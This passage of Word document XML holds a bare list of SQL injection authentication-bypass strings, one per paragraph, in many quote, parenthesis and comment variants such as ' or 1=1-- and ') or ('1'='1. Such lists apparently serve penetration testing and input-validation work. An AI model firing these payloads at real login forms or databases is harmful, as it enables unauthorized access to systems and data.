          <w:p w14:paraId="2F9CA869" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> or 1=1--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27F59D16" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> or 1=1/*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14981FC6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> or 1=1#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B07AD0C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> or 1=1–</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60866F16" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 1=1--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20609502" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' OR '1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3441246D" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or '1'='1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="421F3400" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or '1'='1'--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="421ACC00" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or '1'='1'/*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1910FA56" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or '1'='1'#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B608305" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>' or '1</w:t>
            </w:r>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>′</w:t>
            </w:r>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>='1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="008F1F20" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 1=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DA9CCF8" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 1=1 --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4628FE5E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 1=1 –</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DB32AF0" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 1=1--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D82FF9F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 1=1;#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="359546B6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 1=1/*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AC686B0" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 1=1#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D29EE38" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 1=1–</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA4C3D7" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 1=1 or ''='</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57FA05B7" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>') or '1'='1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DBA2C00" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>') or '1'='1--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A36D2C4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>') or '1'='1'--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04409015" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>') or '1'='1'/*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BE4382A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>') or '1'='1'#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D4B887D" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>') or ('1'='1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15BFE619" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>') or ('1'='1--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DEB19E1" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>') or ('1'='1'--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F4CD3E9" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>') or ('1'='1'/*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="016A5F33" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>') or ('1'='1'#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68D2DAED" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>'or'1=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C25A72A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>'or'1=1</w:t>
            </w:r>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>′</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B8ADF3B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" or "1"="1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29A2C6B5" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" or "1"="1"--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64ADD349" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" or "1"="1"/*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B8F86EF" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>" or "1"="1"#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C3882D9" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" or 1=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F009AC5" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" or 1=1 --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="453E4C89" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" or 1=1 –</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="020AFCDD" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" or 1=1--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A935CA2" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" or 1=1/*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0255B575" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" or 1=1#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D1F04A0" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" or 1=1–</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A012DAB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>") or "1"="1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A41C4CD" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>") or "1"="1"--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0827B17C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>") or "1"="1"/*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75D0A0AF" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>") or "1"="1"#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FB15415" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>") or ("1"="1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30F382DF" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>") or ("1"="1"--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08F0654E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
